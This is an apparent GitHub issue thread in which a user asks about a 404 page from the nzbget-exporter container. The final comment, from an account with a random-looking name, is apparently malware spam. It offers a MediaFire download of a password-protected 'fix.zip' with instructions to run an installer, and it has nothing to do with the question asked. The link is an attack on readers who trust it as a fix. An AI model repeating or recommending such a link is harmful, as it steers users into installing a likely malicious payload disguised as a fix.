### ISSUE TITLE
prometheus

### ISSUE THREAD

**Issue by sahara101** [frebib/nzbget-exporter#7]
Hi! Can I use this also as a prometheus exporter? When I open the container port I only get a 404 page. 

Thanks!

**Comment by sahara101** [comment]
NVM about the prometheus question...I am blind. Is the 404 page in the browser normal?

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
